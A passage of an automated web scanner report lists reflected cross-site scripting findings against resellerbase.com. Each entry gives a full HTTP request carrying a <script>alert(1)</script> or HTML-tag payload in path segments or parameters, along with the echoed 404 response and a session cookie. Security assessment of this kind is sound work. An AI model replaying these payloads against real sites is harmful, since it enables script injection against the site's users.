2.2439. http://www.resellerbase.com/detail/36/rating.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/36/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a840f<script>alert(1)</script>7c317c5ab6c0c325 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detaila840f<script>alert(1)</script>7c317c5ab6c0c325/36/rating.php?id=36&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/36/nemproduction-com-german.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:26:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaila840f<script>alert(1)</script>7c317c5ab6c0c325/36/rating.php?id=36&rating=5 was not found on this server.</p>
...[SNIP]...

2.2440. http://www.resellerbase.com/detail/36/rating.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/36/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 502d3<script>alert(1)</script>e6eb85d81fe was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/36502d3<script>alert(1)</script>e6eb85d81fe/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/36502d3<script>alert(1)</script>e6eb85d81fe/rating.php was not found on this server.</p>
...[SNIP]...

2.2441. http://www.resellerbase.com/detail/36/rating.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/36/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c7f81<script>alert(1)</script>273645b20c121041a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/36c7f81<script>alert(1)</script>273645b20c121041a/rating.php?id=36&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/36/nemproduction-com-german.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:27:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/36c7f81<script>alert(1)</script>273645b20c121041a/rating.php?id=36&rating=5 was not found on this server.</p>
...[SNIP]...

2.2442. http://www.resellerbase.com/detail/36/rating.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/36/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 67fc4<script>alert(1)</script>4499ca9fc14 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/36/rating.php67fc4<script>alert(1)</script>4499ca9fc14 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/36/rating.php67fc4<script>alert(1)</script>4499ca9fc14 was not found on this server.</p>
...[SNIP]...

2.2443. http://www.resellerbase.com/detail/36/rating.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/36/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9b23d<script>alert(1)</script>1e59b74802571168a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/36/rating.php9b23d<script>alert(1)</script>1e59b74802571168a?id=36&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/36/nemproduction-com-german.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:28:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/36/rating.php9b23d<script>alert(1)</script>1e59b74802571168a?id=36&rating=5 was not found on this server.</p>
...[SNIP]...

2.2444. http://www.resellerbase.com/detail/36/rating.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/36/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b68c9<script>alert(1)</script>b44e18046d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/36/rating.php?b68c9<script>alert(1)</script>b44e18046d9=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/36/rating.php?b68c9<script>alert(1)</script>b44e18046d9=1 was not found on this server.</p>
...[SNIP]...

2.2445. http://www.resellerbase.com/detail/36/rating.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/36/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d2c46<script>alert(1)</script>793584323599f1f6c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/36/rating.php/d2c46<script>alert(1)</script>793584323599f1f6c?id=36&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/36/nemproduction-com-german.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/36/rating.php/d2c46<script>alert(1)</script>793584323599f1f6c?id=36&rating=5 was not found on this server.</p>
...[SNIP]...

2.2446. http://www.resellerbase.com/detail/36/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/36/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 215b6<script>alert(1)</script>0e5e8fba8cd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail215b6<script>alert(1)</script>0e5e8fba8cd/36/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/36/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:26:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail215b6<script>alert(1)</script>0e5e8fba8cd/36/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2447. http://www.resellerbase.com/detail/36/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/36/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e24d8<script>alert(1)</script>cba21262594 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/36e24d8<script>alert(1)</script>cba21262594/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/36/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:26:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/36e24d8<script>alert(1)</script>cba21262594/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2448. http://www.resellerbase.com/detail/36/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/36/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 348d9<script>alert(1)</script>693b58b49d3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/36/search.php348d9<script>alert(1)</script>693b58b49d3?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/36/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:26:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/36/search.php348d9<script>alert(1)</script>693b58b49d3?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2449. http://www.resellerbase.com/detail/36/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/36/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 6eb08<a>415a653e0a1 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/36/search.php?keyword=search...&Submit3=Search6eb08<a>415a653e0a1&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/36/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/36/search.php?keyword=search...&Submit3=Search6eb08<a>415a653e0a1&opt=2 was not found on this server.</p>
...[SNIP]...

2.2450. http://www.resellerbase.com/detail/36/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/36/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 25d2f<a>326b614cf84 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/36/search.php?keyword=search...25d2f<a>326b614cf84&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/36/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/36/search.php?keyword=search...25d2f<a>326b614cf84&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2451. http://www.resellerbase.com/detail/36/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/36/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ccddc<script>alert(1)</script>810402765d4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/36/search.php?keyword=search...&Submit3=Search&opt=2&ccddc<script>alert(1)</script>810402765d4=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/36/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/36/search.php?keyword=search...&Submit3=Search&opt=2&ccddc<script>alert(1)</script>810402765d4=1 was not found on this server.</p>
...[SNIP]...

2.2452. http://www.resellerbase.com/detail/36/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/36/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload acb3e<a>c49b25cb185 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/36/search.php?keyword=search...&Submit3=Search&opt=2acb3e<a>c49b25cb185 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/36/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/36/search.php?keyword=search...&Submit3=Search&opt=2acb3e<a>c49b25cb185 was not found on this server.</p>
...[SNIP]...

2.2453. http://www.resellerbase.com/detail/36/themes/kosmos/images/rating/0.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/36/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 71156<script>alert(1)</script>e433f943718 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail71156<script>alert(1)</script>e433f943718/36/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail71156<script>alert(1)</script>e433f943718/36/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.2454. http://www.resellerbase.com/detail/36/themes/kosmos/images/rating/0.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/36/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload dd9f5<script>alert(1)</script>835cc133685 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/36dd9f5<script>alert(1)</script>835cc133685/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/36dd9f5<script>alert(1)</script>835cc133685/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.2455. http://www.resellerbase.com/detail/36/themes/kosmos/images/rating/0.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/36/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload be077<script>alert(1)</script>c6deef339be was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/36/themesbe077<script>alert(1)</script>c6deef339be/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/36/themesbe077<script>alert(1)</script>c6deef339be/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.2456. http://www.resellerbase.com/detail/36/themes/kosmos/images/rating/0.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/36/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4fe07<script>alert(1)</script>5687c7616c1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/36/themes/kosmos4fe07<script>alert(1)</script>5687c7616c1/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/36/themes/kosmos4fe07<script>alert(1)</script>5687c7616c1/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.2457. http://www.resellerbase.com/detail/36/themes/kosmos/images/rating/0.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/36/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload ad179<script>alert(1)</script>070a9b34b9d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/36/themes/kosmos/imagesad179<script>alert(1)</script>070a9b34b9d/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:11 GMT
Server: Apache/2
